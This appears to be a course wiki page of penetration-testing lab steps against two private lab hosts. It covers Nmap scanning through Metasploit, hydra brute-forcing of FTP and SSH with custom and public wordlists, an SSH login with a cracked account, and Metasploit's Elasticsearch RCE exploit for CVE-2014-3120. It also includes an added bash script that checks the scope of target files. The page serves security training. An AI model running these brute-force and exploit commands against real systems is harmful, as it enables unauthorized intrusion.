z‐ old Labs
Dean Bushmiller edited this page Jun 20, 2024 · 1 revision
- You may do unsupported local lab
- You should do AWS remote lab
- Capture user information to build user list
- As we go populate artifact sheet https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit#gid=0
- Collect social media or public data
- Think of all the ways admins build user logins, and populate the user list on the sheet
- Think of all the ways to make a bad password or login, and use them to populate the password list
- You are doing what a tester does.
- You need to put in 1000 hours of deliberate practice to be a pen tester
- This is a walk in the park, not building a park
- Load user list into Kali with wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
- cat expsecusers.txt
- Victim IP addresses: 10.0.0.10 & 10.0.0.21 (2)
- Using Metasploit and Nmap together as a scanner
- IN KALI
- @ $
- bash
- this is an insecure shortcut for production systems
- sudo -i
- @ root
- msfconsole
- @ msf6>
- color true
- db_nmap -sS -A 10.0.0.10-21
- services
- Document
- IN Artifact repository Manually (google sheet/ YOUR copy and paste)
- Copy output to Vulnerabilities 1 tab (still unconfirmed)
- https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing
- Reformat
- IN KALI
- @ msf6>
- exit
- !!!done!!!
- IN KALI
- @ root
- apt -y install seclists
- seclists -h
- Upload expsec possible user list & custom password list
- Shortcut: I put cleaned expsec (this takes planning & process)
- User list on AWS S3
- Using wget & moving into correct directory
- IN KALI
- @ root
- wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
- mv expsecusers.txt /usr/share/seclists/Usernames/
- wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt
- mv expsec-passwords.txt /usr/share/seclists/Passwords/
- !!!done!!!
- Using hydra
- From Scan: Port 21 & 22 are open on .10 & .21
- From seclists we have multiple lists (one real short, one fake because the lab can't take 122 hrs)
- Make 2 target lists by echoing data into a file
- IN KALI
- @ root
- echo '10.0.0.10:21' >> targetsFTP.txt
- echo '10.0.0.21:21' >> targetsFTP.txt
- echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt
- Verify your file contents
- cat targetsFTP.txt
- cat targetsSSH.txt
- Verify that you are in /usr/share/seclists (see 2 target files above)
- ls
- Use 1 famous list of passwords & a custom list
- How long does the first take?
- hydra -L ./Usernames/expsecusers.txt -P ./Passwords/xato-net-10-million-passwords-100.txt -M targetsFTP.txt ftp
- hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp
- hydra -L ./Usernames/expsecusers.txt -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh
- Who do we get?
- Document
- IN Artifact repository Manually (google sheet/ your copy and paste)
- Copy output to Vulnerabilities 1 tab (still unconfirmed)
- Reformat
- !!!done!!!
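An automated version of the "verify your file contents" step above, as an added example that is not part of the original lab. It checks a `hydra -M` target file against the lab's two victim IPs and the two ports the scan found open, and flags the duplicates that re-running an `echo ... >>` line creates. The function name `check_targets` and the demo file are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the lab): scope check for a host:port target file.
# check_targets is a hypothetical helper name; the values below come from this page.
IN_SCOPE="10.0.0.10 10.0.0.21"   # the two victim IPs of this lab
ALLOWED_PORTS="21 22"            # ports the scan reported open on both

# check_targets FILE: print one line per problem; return 0 only if FILE is clean.
check_targets() {
    local file="$1" line host port n=0 bad=0 seen=" "
    [ -r "$file" ] || { echo "cannot read $file"; return 2; }
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        [ -z "$line" ] && continue
        case $line in
            # whitespace (including a stray CR) would defeat the list matching below
            *[[:space:]]*) echo "$file:$n: not host:port: $line"; bad=1; continue ;;
            *:*) host=${line%%:*}; port=${line##*:} ;;
            *)   echo "$file:$n: not host:port: $line"; bad=1; continue ;;
        esac
        case " $IN_SCOPE " in
            *" $host "*) ;;
            *) echo "$file:$n: host not in scope: $host"; bad=1 ;;
        esac
        case " $ALLOWED_PORTS " in
            *" $port "*) ;;
            *) echo "$file:$n: unexpected port: $port"; bad=1 ;;
        esac
        case $seen in
            *" $line "*) echo "$file:$n: duplicate entry: $line"; bad=1 ;;
            *) seen="$seen$line " ;;
        esac
    done < "$file"
    return "$bad"
}

# Constructed demo input: entry 3 repeats entry 2 (what re-running an
# echo ... >> line produces) and entry 4 is a typo outside the two victims.
demo=$(mktemp)
printf '%s\n' '10.0.0.10:21' '10.0.0.21:21' '10.0.0.21:21' '10.0.0.12:21' > "$demo"
check_targets "$demo" || echo "fix the file before using it with hydra -M"
rm -f "$demo"
```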
- ProFTPD 1.3.5
- Oracle Glassfish Application Server
- wap-wsp / port 9200
- (for last one google: what is wap-wsp / port 9200)
- Research using:
- https://nvd.nist.gov/vuln/search or https://www.cvedetails.com/
- https://www.exploit-db.com/
- Document
- IN Artifact repository Manually (google sheet/ your copy and paste)
- !!!done!!!
- We have SSH so we can do anything. But we are not.
- Start an SSH instance and escalate priv.
- IN KALI
- @ root
- ssh 10.0.0.21 -l boba_fett
- Supply password from your Artifact's sheet
- CTRL Z
- You now have a remote shell on the Windows victim (it will NOT act like your Kali terminal)
- What you can do depends on Microsoft administrator skills.
- Exploit port 9200
- IN KALI
- @ msf6>
- ? what services have we captured
- services
- ? use exploit (CVE-2014-3120)
- I am not giving you the settings for set (you must think and apply what you have learned)
- use exploit/multi/elasticsearch/script_mvel_rce
- set RHOST
- set LHOST
- set RPORT
- set LPORT 4444
- Normally we set PAYLOAD, but we are trying to verify the exploit only
- run
- returned message: Exploit completed, but no session was created.
- !!!done!!!